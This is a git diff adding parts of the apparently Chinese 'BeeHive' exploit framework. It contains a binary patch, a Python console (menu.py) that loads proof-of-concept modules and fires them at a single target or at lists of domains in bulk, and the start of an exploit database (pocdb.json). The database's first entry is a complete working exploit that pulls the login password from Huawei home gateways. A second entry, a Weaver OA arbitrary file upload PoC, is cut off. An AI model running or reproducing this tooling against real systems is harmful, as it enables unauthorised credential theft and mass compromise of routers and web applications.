za5Zsj55t3pvb5m&xr6b>%Qs&Wuo<9+-~Rv)>B>jFInTaHV8_zUw^<{(q)>iOzls}M
zhW+9T&CA!6!ktz@J((UUBsM{l-Hn-BDWL7p;O*CMHLqW!DQu{+8MsyFe<dc>Q$Tow
zJ{%Zl@J-5VcIsZott45!1B5i*CNMh;lTRlKA8@y<l9na$51<4vxhvf3GNo9QJuC7$
z?oUacq2tzjl#SBC_^097mH`CA<LyVGK={~XO#|sy$^ZQ$Uj5ImKd$Tg<JWutrws0z
zlx02Yiv<Hjyyhz)s0p?Pwmp#3fMdl@g3wowmV5*j4N#bxB!`L(w@gUd;liVZ67L4W
z(aO#!;8TSvk_ZS3F;Y~ER0ptjShci99@zje8z?#wq;7i3W%wsyvU$LIG9|&w;hV#P
zr`uC3oAEl6m~V+|$m9g@$4pipVNkhhrZy3cDvmu^<CST<nl09=8Coy~;KRiX-SH{`
z1$nRSd>-&1!KXD-SCeR_IzHWbvut;NB4-OjHb4nBe2c2|@&T)&A8<6}w}XzA`y4oA
z>(YO=e{)%@0%<IaMCZKqVUXOs7hD##hIKlf>Qu2ITpDS0Mqt@B9zpqRu$l;ARQSnS
zug}wqFpW#+6bTWKM9-rlUw!^jtMLG4Swv1#x@p74*=K$CB@$;p0AYo^0i_=j<Molu
z-Ql$%aP~`HHJ~X(m<B?zZEL<CH>!2@X4H!Ln$0c1mU!c}jFH%2?~)q<D^vbRJRNu-
zcLW2m{o2#-b#H%n=M_Hx-2coUh9l}8{us|j%IpS2oTjW>7>`s~pYb^ab&WNwIEeo{
zO?g*0wp_d)UL)-CvcO++QXFH$Hy}~=d~yzqn*}33C@auPV5=iHa0ai5sAnebbShJy
zh#N0Xu~wS~`l;sR`O7j2DTXQPoH6045FTPXk?q$qWq_!UiMv5~0Vi*2x*h{>s*ocW
zov?V=m2?YUlo>L-p;n(k2+J6($C}eqh>ypeE%A6CIQNlV94PX7Mw>M4xrg3zIx^^8
z*N`?UECuh@IMm|{yjhmzbcoFN8H+faNXRc0ff9$Q2&}kfiwNH}k-ZGxHfFUJA!jif
z+$8Mbk`ZNbXVnCItm1(BA6V-EQ<cOF7_w!MnNqzL?Pe1g<!nZHuH|{+Ap;Bm1}tD_
zOhY+(uwUrmqO}*whl|xp*+^TACz9}m5*B&fOyGnahBD&@$TROT<VkL!T(L4;GojwX
zlsjOQ?Wf{AE5g*HtIkW=BeRR_g`%5CsN}{>^lbHRt`2*|J$sIKszP^tVz4)rNTgz`
zkEVTWmG6r4KhQ7sKRN$FoGh(*gC~}-JKq_*t5lrIP6KOP_t;A$P35_r<~b7)4h#e^
z52K3mU=)-|pno%@DwXlW$?8}qpJ1^I7JS}$1o#B^$O7CsISuJ%qN!s1zV;*|c(Hy4
zJ)T2kuE#8}ZsJ2?qtxmG)9NCsO7p<NligynR;0-8)AU_&Mkg|2>2Z@-I4Oq;U>O_u
zw&-oT7a+1+W~>l%o-R}-V$P$}rD?$Wxc+A>&|Dq3J(*cW@G;<26ugo%5P+kX>zs1Z
z;;lrkz_lqQv7%=jChr&^%WyvjH5wl*u=olHst4l;2~jE_n5jZpKCp9fb^*>;0Kc#f
z2Rs5qUi1mi<PT@ch&W@Ev7d&|Ld!y#5{@~uay15hhz|kS6FF=W1=<m=4I?Q*k1BOS
z1s#`{YVb+(PhI>V9U?c;R4G$80J>&5`9&sKtK>xTqG&04#37lkJ1oNr=!kjF$mb;k
z_Xmy5>P}T;*LI-ifr$cRubPCX42CM$FvlLW6Sx^rCt0(UPPRDin9b`vS>$0PZW)53
zT(eS*-WmRhVOL6%(<S(CNe87H0?a`76qF0#nsi=sJ$mi)pJ8Bhul1aFB>N;7Ee%hf
zl)Eijxfl{#UnN%qhuMwsqAHp_|IWdmIfzeQ;^(LeuH=6v9qVgZIN3>l^WtAnuz;o3
z=$Pf}RENBwQeyL!-}9B##0d>Iy8QC3(*)ouzf!lWXngLsJdX_)g;dKgEx-5r@*BU?
zjyh>(z48;eoub1-Bu2pCavJHwO4Q~m=Sr!R<!&z?Gnb+Y<Q&bQs>Pni1UAma&)&E6
zlD|+1qL(o^3Ir3ZgXT!kY}NpX$<F=hK`As}69{2@CCjNcceJljh|(d!#5EOlfcKQz
zA&wU1a3%%D(!Yo!34%38z&Im@?(}2~Y^U;3RI_6QGaJB6PwA);SRtyKXgOS4f`n=m
z9L68_HW2$s#{*VRfppXkH!!>;&%rebkz%>3O&jHjqvFQ#=mMDGa^(xdGMmzE+?*^@
zmKmiPgq&BYF>A<3m0{5pnW!*V3N#stb&zIQ5`zFL%c*SB4fJ7!>QWR$Ew3>-$Ow7U
zQ&J?{MD(y~x`fiJ3=fITr=r4*x-5-J&=mFRXrow;T%A0#EmfvEt8_LW+wy_nrnDb@
zCH-IS|LV-BadGr?3zS{=)~(Uns#_kWklqjCG<xWEF!!i+z{@>Pm3PDDrwTp$RX>lL
zD1W!vYT>RL9z|-TacNkORD2gAQoXP*E8(v_-8=F)AL9EBq%F4A?mG^%7Uvuh0W^xN
z#~Gpcl<e1M#9@@)TbQI2_OlLm0G$6B)c5pb4?nxTdvk%mV^W^79CH#eC)yb8(n9_&
zq{%*>V9+x5o^ELgfZ{t1Pu|3QuXG%JbVs76kQS=azcjb@+_YP_H+hXKDc`-7L1>$i
zTT9+@e`Kuj>8Xx(me6y^3$<u-jQdz%>9FMh(mKB82wV*0_yK_{?&(gfv6j0_cj((|
z%wQiozzdJZcUL7ad#uuvN~JoJayLrFW6_#r`@@%;*H2;C(2~-c1tfL_4GcEcMysWN
za?StNWWZ6WK_Ymmwq}YabF*2%fN)lnwybxc--2ns(=GS2$Hmub&-v>2?cmG}8|&L)
zj0%Ev8sq;}`hUXM|K$9GH~J3$eXah#Z|#5XQ3?G0t^JQuOaWXHn`!yyvj1J5BOkLh
zf0mjlnt`~qa2#i{<{lDYPdOFOh)8wF=G({HAAhXRL~<{+*tv1ui{x9b9j<L{yA<a(
WZgV}htIlEnki?J@VEq@d|Nk!zYgH)#

literal 0
HcmV?d00001

diff --git a/menu.py b/menu.py
new file mode 100755
index 0000000..07ef3ca
--- /dev/null
+++ b/menu.py
@@ -0,0 +1,591 @@
+#!/usr/bin/env python
+# coding: utf-8
+# site  : www.beebeeto.com
+# team  : n0tr00t security
+
+import os
+import sys
+import optparse
+import pyparsing
+import pprint as pr
+import textwrap as tw
+import traceback as tb
+
+from lib.scanner import Storm, Hunter, TestPlatform
+from prettytable import PrettyTable
+from lib.io import bprint, bprintPrefix
+from lib import db, poc, cmd2, banners, pprint2
+from SETTINGS import BEESCAN_DIR, POC_DIR, VERSION
+
+
+# decorater to record last command return value
+def recordCmdRet(valName):
+    def _recordCmdRet(func):
+        def __recordCmdRet(self, *args, **kwargs):
+            ret = func(self, *args, **kwargs)
+            setattr(self, valName, ret)
+            return
+        return __recordCmdRet
+    return _recordCmdRet
+
+
+
+class BaseMenu(cmd2.Cmd):
+    default_to_shell = True
+    timing = False
+    nonWhiteMsg = 'Please enter a non white space string.'
+
+    def __init__(self):
+        super(BaseMenu, self).__init__()
+        self.database = db.Database(dbFilePath='./hive.db')
+        self.retLastSearch = None  # the result of last search
+
+    def postloop(self):
+        self.database.dbConn.close()
+
+    def postcmd(self, stop, line):
+        return stop
+
+    def do_status(self, arg):
+        '''print status information.'''
+        bprintPrefix('BeeHive Version: %s' % VERSION, msgType='ok')
+        bprintPrefix('Exploits & PoCs: %d\n' % self.database.countAll()[0], 'ok')
+
+    @recordCmdRet(valName='retLastSearch')
+    def do_search(self, arg):
+        # the func doc below cannot be automatically used as help doc
+        # because this func is wrapped by a decorator.
+        if not arg.strip():
+            bprintPrefix(self.nonWhiteMsg, 'warning')
+            return
+        try:
+            results = self.database.searchStr(arg.strip())
+        except Exception, err:
+            print '[-] ',
+            print err
+            return
+        res_tb = PrettyTable(['Name', 'Datetime', 'Level',
+                              'Author', 'Batch', 'Pid',])
+        res_tb.align['Name'] = 'l'
+        for r in results:
+            res_tb.add_row(((r[1][:35]+'...').strip(),
+                            r[5][:10],r[3],r[4][:10],
+                            r[-2],r[0][4:]))
+        print res_tb.get_string(sortby='Pid', reversesort=False)
+        return results
+
+    def help_search(self):
+        print '''[*] Search for pocs/exps.'''
+
+    def do_run(self, arg):
+        bprintPrefix("Can't run this command under the root menu.", 'error')
+        return
+
+    def help_run(self):
+        print '''[-] UNKOWN'''
+
+    @cmd2.options([cmd2.make_option('-m', '--mode', action='store', help='Update database. (json / pocs)'),])
+    def do_updatedb(self, arg, opts=None):
+        ''''''
+        if opts.mode == 'pocs':
+            try:
+                num_insert, num_all, num_err, err_list = self.database.updtDbFromPocs(pocDir=POC_DIR)
+                print '[*] Scan local mode\n%s\nTotal: %s' % ('--'*10, num_all)
+            except Exception, err:
+                bprintPrefix(err, 'error')
+        elif opts.mode == 'json':
+            try:
+                num_insert, num_all, num_err, err_list = self.database.updtDbFromJson('./pocdb.json')
+                print '[*] JSON import mode\n%s\nTotal: %s' % ('--'*10, num_all)
+            except Exception, err:
+                bprintPrefix(err, 'error')
+        else:
+            bprintPrefix('WTF!?', 'warning')
+            return
+        bprint('Insert number: %s' % num_insert, 'ok')
+        bprint('Error number: %s' % num_err, 'error')
+        for i in err_list:
+            print '    %s' % i
+
+    def do_showloaded(self, arg):
+        '''[*] Show current loaded poc(s)'''
+        if hasattr(self, 'loadedPocs') and self.loadedPocs:
+            if isinstance(self, (ShooterMenu, HunterMenu)):
+                bprintPrefix('loaded poc: %s' % \
+                      self.loadedPocs.poc_info.get('poc').get('id'), 'ok')
+            elif isinstance(self, StormMenu):
+                bprintPrefix('loaded pocs: ', 'ok')
+                for pocPath in self.loadedPocs:
+                    print '    %s' % os.path.basename(pocPath)
+        else:
+            bprint('[-] no poc has been loaded.', 'error')
+
+    def do_lastret(self, arg):
+        '''[*] Show the result of last scan.'''
+        if hasattr(self, 'retLastScan') and self.retLastScan:
+            try:
+                print
+                res_tb, ret = self.retLastScan
+                print res_tb.get_string(sortby='Status', reversesort=False)
+                print
+            except Exception, e:
+                bprintPrefix('%s\n'%str(e), 'warning')
+        else:
+            bprintPrefix('No scan result.\n', 'warning')
+
+    def do_export(self, arg):
+        '''[*] Save the result as a file.'''
+        if not arg.strip():
+            bprintPrefix(self.nonWhiteMsg, 'error')
+            return
+        if hasattr(self, 'retLastScan') and self.retLastScan:
+            try:
+                res_tb, ret = self.retLastScan
+                _output = open(arg.strip(), 'a+')
+                _output.write(str(ret))
+                _output.close()
+                bprintPrefix('Write file success: %s' % arg.strip(), 'ok')
+            except Exception, e:
+                bprintPrefix('%s\n'%str(e), 'warning')
+        else:
+            bprintPrefix('No scan result.\n', 'warning')
+
+    def do_info(self, arg):
+        '''[*] View code information and usage.'''
+        if not arg.strip():
+            bprintPrefix(self.nonWhiteMsg, 'error')
+            return
+        if not arg.strip().startswith('poc'):
+            pocName = 'poc-' + arg.strip()
+            if pocName.strip()[8] != '-':
+                pocName = 'poc-' + pocName[-8:-4] + '-' + pocName[-4:]
+        else:
+            pocName = arg.strip()
+        pocInfo = self.database.searchPoc(
+            pocId=pocName.strip().replace('_', '-'))
+        if pocInfo is None:
+            bprintPrefix('Cannot find poc %s in database.' % arg, 'error')
+            return
+        pocId, name, rank, level, author, createDate, protocol, port, \
+            layer4Protocol, appName, vulType, desc, tag, batchable, \
+            path = pocInfo
+        if not path or not os.path.exists(path):
+            bprintPrefix('Poc file %s not exists, perhaps you have\'t bought '\
+                  'it.\n' % path, 'error')
+            return
+        try:
+            p = poc.Poc(path=os.path.join(POC_DIR, '%s.py' % \
+                                          pocName.strip().replace('-', '_')),
+                        batchable=batchable)
+            mp = p.module.MyPoc(run_in_shell=False)
+            mp._init_parser(do_parse=False)
+            bprint('%s information:' % path, 'ok')
+            pprint2.pprint(mp.poc_info)
+            print
+            bprint('%s help:' % path, 'ok')
+            mp.base_parser.print_help()
+            #return mp
+        except Exception, err:
+            bprintPrefix(err, 'error')
+
+    @staticmethod
+    def extRunPocOpt(option_list, arg_desc="arg"):
+        '''
+           Used as a decorator and passed a list of optparse-style options,
+           alters a cmd2 method to populate its ``opts`` argument from its
+           raw text argument.
+
+           Example: transform
+           def do_something(self, arg):
+
+           into
+           @extPocOpt([make_option('-q', '--quick', action="store_true",
+                      help="Makes things fast")],
+                      "source dest")
+           def do_something(self, arg, opts):
+               if opts.quick:
+                   self.fast_button = True
+        '''
+
+        if not isinstance(option_list, list):
+            option_list = [option_list]
+        for opt in option_list:
+            cmd2.options_defined.append(
+                pyparsing.Literal(opt.get_opt_string())
+            )
+
+        def option_setup(func):
+            optionParser = cmd2.OptionParser()
+            for opt in option_list:
+                optionParser.add_option(opt)
+            optionParser.set_usage("%s [options] %s" % (func.__name__[3:], arg_desc))
+            optionParser._func = func
+            def new_func(instance, arg):
+                try:
+                    for opt in instance.loadedPocs.base_parser._get_all_options():
+                        try:
+                            optionParser._check_conflict(opt)
+                            optionParser.add_option(opt)
+                        except optparse.OptionConflictError as e:
+                            pass
+                    instance.runParser = optionParser
+                    opts, newArgList = optionParser.parse_args(arg.split())
+                    # Must find the remaining args in the original argument list, but
+                    # mustn't include the command itself
+                    #if hasattr(arg, 'parsed') and newArgList[0] == arg.parsed.command:
+                    #    newArgList = newArgList[1:]
+                    newArgs = cmd2.remaining_args(arg, newArgList)
+                    if isinstance(arg, cmd2.ParsedString):
+                        arg = arg.with_args_replaced(newArgs)
+                    else:
+                        arg = newArgs
+                except optparse.OptParseError as e:
+                    print (e)
+                    optionParser.print_help()
+                    return
+                except AttributeError as e:
+                    bprintPrefix('Please load a poc first.', 'warning')
+                    return
+                if hasattr(opts, '_exit'):
+                    return None
+                result = func(instance, arg, opts)
+                return result
+            new_func.__doc__ = '%s\n%s' % (func.__doc__, optionParser.format_help())
+            return new_func
+        return option_setup
+
+
+
+class MainMenu(BaseMenu):
+    prompt = 'beehive > '
+
+    def preloop(self):
+        num_count = str(self.database.countAll()[0])
+        print banners.getBanner()
+        bprint('%sn0tr00t security team\n' % (' '*20), 'warning')
+        sys.stdout.write('Beehive Version: ')
+        bprint(VERSION, 'ok')
+        sys.stdout.write('Exploits & Pocs: ')
+        bprint(num_count, 'ok')
+        sys.stdout.write('Contact: ')
+        bprint('root@beebeeto.com', 'ok')
+        sys.stdout.write('Forum: ')
+        bprint('  http://buzz.beebeeto.com', 'ok')
+        print
+
+    def do_shooter(self, arg):
+        '''[*] Go to the shooter(1 poc --> 1 target) sub menu.'''
+        sm = ShooterMenu()
+        sm.cmdloop()
+
+    def do_storm(self, arg):
+        '''[*] Go to the storm(N poc --> 1 target) sub menu.'''
+        sm = StormMenu()
+        sm.cmdloop()
+
+    def do_hunter(self, arg):
+        '''[*] Go to the hunter(1 poc --> N targets) sub menu.'''
+        hm = HunterMenu()
+        hm.cmdloop()
+
+
+
+class StormMenu(BaseMenu):
+    prompt = 'beehive.storm > '
+
+    @recordCmdRet(valName='loadedPocs')
+    def do_loadsearched(self, arg):
+        if not self.retLastSearch:
+            bprint('[-] please make a search first.', 'error')
+            return
+        batchablePocPaths = []
+        unbatchablePocPaths = []
+        for pocInfo in self.retLastSearch:
+            pocId, name, rank, level, author, createDate, protocol, port, \
+                layer4Protocol, appName, vulType, desc, tag, batchable, \
+                path = pocInfo
+            if batchable:
+                batchablePocPaths.append(path)
+            else:
+                unbatchablePocPaths.append(path)
+        if unbatchablePocPaths:
+            bprintPrefix('These pocs in last search results are not batchable:', 'warning')
+            bprintPrefix('They cannot be loaded in Storm mode, please load them '\
+                  'singlely in the Shooter mode.', 'warning')
+            for pocPath in unbatchablePocPaths:
+                print '    %s' % os.path.basename(pocPath)
+        if unbatchablePocPaths and batchablePocPaths:
+            print
+        if batchablePocPaths:
+            bprintPrefix('These pocs in last search results are batchable:', 'ok')
+            bprintPrefix('They are going to be used to load Storm mode scan.', 'ok')
+            for pocPath in batchablePocPaths:
+                print '    %s' % os.path.basename(pocPath)
+            return batchablePocPaths
+        else:
+            bprintPrefix('None of the poc in last search result is batchable.', 'warning')
+            return None
+
+    def help_loadsearched(self):
+        bprintPrefix('load last searched result(s) to test a target.', 'info')
+
+    @recordCmdRet(valName='retLastScan')
+    def do_run(self, arg):
+        if not hasattr(self, 'loadedPocs') or not self.loadedPocs:
+            bprintPrefix('Please load a poc first.', 'warning')
+            return
+        if not arg.strip():
+            bprintPrefix('Please enter the target.', 'error')
+            return
+        s = Storm(target=arg,
+                  listPocPaths=self.loadedPocs,
+                  poolModule=TestPlatform(),
+                  concurrency=20, verify=True)
+        ret = s.scan()
+        JOB_UNSTART = 0  # poc not run
+        JOB_RUNNING = 1
+        JOB_FINISHED = 2  # poc run ok
+        JOB_ERROR = -1  # error encountered when run poc
+        JOB_ABORT = -2  # running poc is abort, viz unfinished
+        print
+        bprintPrefix('Scan end, Results:\n', 'ok')
+        res_tb = PrettyTable(['Vulnerability', 'Pid', 'Status', 'Result',])
+        res_tb.align['Vulnerability'] = 'l'
+        for r in ret.values():
+            pid = r['args'][0].replace('_', '-')
+            poc_info = self.database.searchPoc(pid)
+            state = r['state']
+            if state == JOB_FINISHED:
+                status = str(r['jobRet']['success'])
+                result = str(r['jobRet']['poc_ret'])
+                if status == 'None':
+                    status = 'False'
+                    result = 'N/A'
+                elif status == 'False':
+                    result = 'Not Vulnerable'
+            elif state == JOB_ERROR:
+                status = 'Error'
+                result = r['exception']
+            else:
+                status = 'Error'
+            res_tb.add_row([poc_info[1][:25]+'...', pid,
+                            status, result[:25]])
+        print res_tb.get_string(sortby='Status', reversesort=False)
+        print
+        return res_tb, ret
+
+    def help_run(self):
+        bprintPrefix('Run loaded poc(s)', 'info')
+
+    @recordCmdRet(valName='loadedPocs')
+    def do_loadall(self, arg):
+        try:
+            batchablePocs = self.database.getBatchable()
+            pocPaths = []
+            [pocPaths.append(i[-1]) for i in batchablePocs]
+            bprintPrefix('%d batchable pocs (%d total pocs) loaded.' % (
+                len(pocPaths),
+                self.database.countAll()[0],
+            ), 'ok')
+            return pocPaths
+        except Exception, err:
+            print '[-] ',
+            print err
+            return
+
+    def help_loadall(self):
+        bprintPrefix('Load all poc to storm a target.', 'info')
+
+
+
+class ShooterMenu(BaseMenu):
+    prompt = 'beehive.shooter > '
+
+    @recordCmdRet(valName='loadedPocs')
+    def do_loadpoc(self, arg):
+        if not arg.strip().startswith('poc'):
+            pocName = 'poc-' + arg.strip()
+            if pocName.strip()[8] != '-':
+                pocName = 'poc-' + pocName[-8:-4] + '-' + pocName[-4:]
+        else:
+            pocName = arg.strip()
+        pocInfo = self.database.searchPoc(
+            pocId=pocName.strip().replace('_', '-'))
+        if pocInfo is None:
+            bprintPrefix('Cannot find poc %s in database.' % arg, 'error')
+            return
+        pocId, name, rank, level, author, createDate, protocol, port, \
+            layer4Protocol, appName, vulType, desc, tag, batchable, \
+            path = pocInfo
+        if not path or not os.path.exists(path):
+            bprintPrefix('Poc file %s not exists, perhaps you have\'t bought '\
+                  'it.\n' % path, 'error')
+            return
+        try:
+            p = poc.Poc(path=os.path.join(POC_DIR, '%s.py' % \
+                                          pocName.strip().replace('-', '_')),
+                        batchable=batchable)
+            mp = p.module.MyPoc(run_in_shell=False)
+            mp._init_parser(do_parse=False)
+            bprintPrefix('load %s success!' % path, 'ok')
+            return mp
+        except Exception, err:
+            bprintPrefix(err, 'error')
+
+    def help_loadpoc(self):
+        bprintPrefix('Load a poc to test a target.', 'info')
+
+    @recordCmdRet(valName='retLastScan')
+    @BaseMenu.extRunPocOpt([
+        cmd2.make_option('-d', '--debug', action="store_true", help="debug mode",)
+    ])
+    def do_run(self, arg, opts=None):
+        if not hasattr(self, 'loadedPocs') or not self.loadedPocs:
+            bprintPrefix('Please load a poc first.', 'warning')
+            return
+        if not opts.target:
+            bprintPrefix('No target input!\n', 'warning')
+            self.runParser.print_help()
+            return
+        print
+        ret = self.loadedPocs.run(options=opts.__dict__, debug=opts.debug)
+        bprintPrefix('%s:\n' % self.loadedPocs.poc_info['poc']['id'], 'info')
+        # results view
+        if ret['options']:
+            print '%starget: %s' % (' '*4, ret['options']['target'])
+        try:
+            if ret['exception']:
+                print '%sexception: %s' % (' '*4, ret['exception'])
+        except Exception, err:
+            pass
+        if ret['success'] == True:
+            print ' '*4,
+            bprintPrefix('success: %s' % ret['success'], 'ok')
+            print ' '*3,
+            bprintPrefix('poc_ret: %s' % ret['poc_ret'], 'ok')
+        else:
+            print '%ssuccess: %s' % (' '*4, ret['success'])
+        print
+        return ret
+
+    def help_run(self):
+        bprintPrefix('Run poc to shoot a target.', 'info')
+
+
+
+class HunterMenu(BaseMenu):
+    prompt = 'beehive.hunter > '
+
+    @recordCmdRet(valName='loadedPocs')
+    def do_loadpoc(self, arg):
+        if not arg.strip().startswith('poc'):
+            pocName = 'poc-' + arg.strip()
+            if pocName.strip()[8] != '-':
+                pocName = 'poc-' + pocName[-8:-4] + '-' + pocName[-4:]
+        else:
+            pocName = arg.strip()
+        pocInfo = self.database.searchPoc(
+            pocId=pocName.strip().replace('_', '-'))
+        if pocInfo is None:
+            bprintPrefix('Cannot find poc %s in database.' % arg, 'error')
+            return
+        pocId, name, rank, level, author, createDate, protocol, port, \
+            layer4Protocol, appName, vulType, desc, tag, batchable, \
+            path = pocInfo
+        if not path or not os.path.exists(path):
+            bprintPrefix('Poc file %s not exists, perhaps you have\'t bought '\
+                  'it.\n' % path, 'error')
+            return
+        try:
+            p = poc.Poc(path=os.path.join(POC_DIR, '%s.py' % \
+                                          pocName.strip().replace('-', '_')),
+                        batchable=batchable)
+            mp = p.module.MyPoc(run_in_shell=False)
+            mp._init_parser(do_parse=False)
+            bprintPrefix('load %s success!' % path, 'ok')
+            return mp
+        except Exception, err:
+            bprintPrefix(err, 'error')
+
+    def help_loadpoc(self):
+        bprintPrefix('Load a poc to test a target.', 'info')
+
+    @recordCmdRet(valName='retLastScan')
+    @BaseMenu.extRunPocOpt([
+        cmd2.make_option('-f', '--file', action="store", help="debug mode"),
+    ])
+    def do_run(self, arg, opts=None):
+        if not hasattr(self, 'loadedPocs') or not self.loadedPocs:
+            bprintPrefix('Please load a poc first.', 'warning')
+            return
+        file_alert = 'Need to load a targets file. (domains)'
+        if not opts.file:
+            bprintPrefix(file_alert, 'warning')
+            return
+        if opts.file:
+            filename = opts.file
+            if filename[0] == "'":
+                filename = filename.strip("'")
+            elif filename[0] == '"':
+                filename = filename.strip('"')
+        try:
+            f_req = open(filename, 'r')
+            if os.stat(filename).st_size == 0:
+                bprintPrefix('File content is empty?', 'warning')
+                return
+        except Exception, err:
+            bprintPrefix(str(err), 'error')
+            return
+
+        # scan main
+        pocid = self.loadedPocs.poc_info.get('poc').get('id')
+        (options, args) = self.loadedPocs.base_parser.parse_args(
+            arg.strip().split())
+        h = Hunter(iterTarget=f_req,
+                   pocPath=('./pocs/%s.py' % pocid.replace('-', '_')),
+                   poolModule=TestPlatform())
+        ret = h.scan()
+
+        # view table
+        JOB_UNSTART = 0  # poc not run
+        JOB_RUNNING = 1
+        JOB_FINISHED = 2  # poc run ok
+        JOB_ERROR = -1  # error encountered when run poc
+        JOB_ABORT = -2  # running poc is abort, viz unfinished
+        print
+        res_tb = PrettyTable(['Target', 'Status', 'Result',])
+        res_tb.align['Target'] = 'l'
+        try:
+            for r in ret.values():
+                target = r['args']
+                pid = r['args'][0].replace('_', '-')
+                poc_info = self.database.searchPoc(pid)
+                state = r['state']
+                if state == JOB_FINISHED:
+                    status = str(r['jobRet']['success'])
+                    result = str(r['jobRet']['poc_ret'])
+                    if status == 'None':
+                        status = 'False'
+                        result = 'N/A'
+                    elif status == 'False':
+                        result = 'Not Vulnerable'
+                elif state == JOB_ERROR:
+                    status = 'Error'
+                    result = r['exception']
+                else:
+                    status = 'Error'
+                res_tb.add_row([target, status, result[:25]])
+        except Exception, err:
+            import traceback
+            traceback.print_exc()
+        print res_tb.get_string(sortby='Status', reversesort=False)
+        print
+        return res_tb, ret
+
+    def help_run(self):
+        bprintPrefix('Run loaded poc(s)', 'info')
+
+
+if __name__ == '__main__':
+    mm = MainMenu()
+    mm.cmdloop()
diff --git a/pocdb.json b/pocdb.json
new file mode 100644
index 0000000..9bac59e
--- /dev/null
+++ b/pocdb.json
@@ -0,0 +1,172 @@
+{"create_date": "2015-07-03 13:38:25", "name": "Huawei Home Gateway UPnP/1.0 IGD/1.00 Password Disclosure Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "\u534e\u4e3a\u6f0f\u6d1e,Password Disclosure Vulnerability", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport socket\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http import transform_target_ip\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0120',\r\n            'name': 'Huawei Home Gateway UPnP/1.0 IGD/1.00 Password Disclosure Exploit',\r\n            'author': 'tmp',\r\n            'create_date': '2015-07-03',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Huawei',\r\n            'vul_version': ['UPnP/1.0', 'IGD/1.00'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['\u534e\u4e3a\u6f0f\u6d1e', 'Password Disclosure Vulnerability'],\r\n            'desc': 'N/A',\r\n            'references': ['https://www.exploit-db.com/exploits/37424/',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        # set timeout\r\n        timeout = 20\r\n        socket.setdefaulttimeout(timeout)\r\n        target = transform_target_ip(args['options']['target'])\r\n        if args['options']['verbose']:\r\n            print '[*] Connecting to: ' + target\r\n        # Connect the socket to the port where the server is listening\r\n        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n        server_address = (target, 80)\r\n        sock.connect(server_address)\r\n        soap = \"<?xml version=\\\"1.0\\\"?>\"\r\n        soap +=\"<s:Envelope xmlns:s=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" s:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\">\"\r\n        soap +=\"<s:Body>\"\r\n        soap +=\"<m:GetLoginPassword xmlns:m=\\\"urn:dslforum-org:service:UserInterface:1\\\">\"\r\n        soap +=\"</m:GetLoginPassword>\"\r\n        soap +=\"</s:Body>\"\r\n        soap +=\"</s:Envelope>\"\r\n        message = \"POST /UD/?5 HTTP/1.1\\r\\n\"\r\n        message += \"SOAPACTION: \\\"urn:dslforum-org:service:UserInterface:1#GetLoginPassword\\\"\\r\\n\"\r\n        message += \"Content-Type: text/xml; charset=\\\"utf-8\\\"\\r\\n\"\r\n        message += \"Host:\" + target + \"\\r\\n\"\r\n        message += \"Content-Length:\" + str(len(soap)) +\"\\r\\n\"\r\n        message += \"Expect: 100-continue\\r\\n\"\r\n        message += \"Connection: Keep-Alive\\r\\n\\r\\n\"\r\n        sock.send(message)\r\n        data = sock.recv(1024)\r\n        if args['options']['verbose']:\r\n            print \"[*] Recieved : \" + data.strip()\r\n        sock.send(soap)\r\n        data = sock.recv(1024)\r\n        data += sock.recv(1024)\r\n        r = re.compile('<NewUserpassword>(.*?)</NewUserpassword>')\r\n        m = r.search(data)\r\n        if m:\r\n            args['success'] = True\r\n            args['poc_ret']['password'] = m.group(1)\r\n        sock.close()\r\n        return args\r\n\r\n\r\n    verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "\u534e\u4e3a", "id": "poc-2015-0120", "layer4_protocol": null}
+{"create_date": "2015-07-01 17:58:49", "name": "\u6cdb\u5fae OA /tools/SWFUpload/upload.jsp \u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e PoC", "level": "\u9ad8\u5371", "batchable": 1, "author": "GurdZain", "rank": 4, "port": null, "vul_type": "\u6587\u4ef6\u4e0a\u4f20", "tag": "\u6cdb\u5faeoa\u6f0f\u6d1e,/tools/SWFUpload/upload.jsp,File Upload,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0117',\r\n            'name': '\u6cdb\u5fae OA /tools/SWFUpload/upload.jsp \u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e PoC',\r\n            'author': 'gurdzain',\r\n            'create_date': '2015-07-01',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': '\u6cdb\u5faeoa',\r\n            'vul_version': ['*'],\r\n            'type': 'File Upload',\r\n            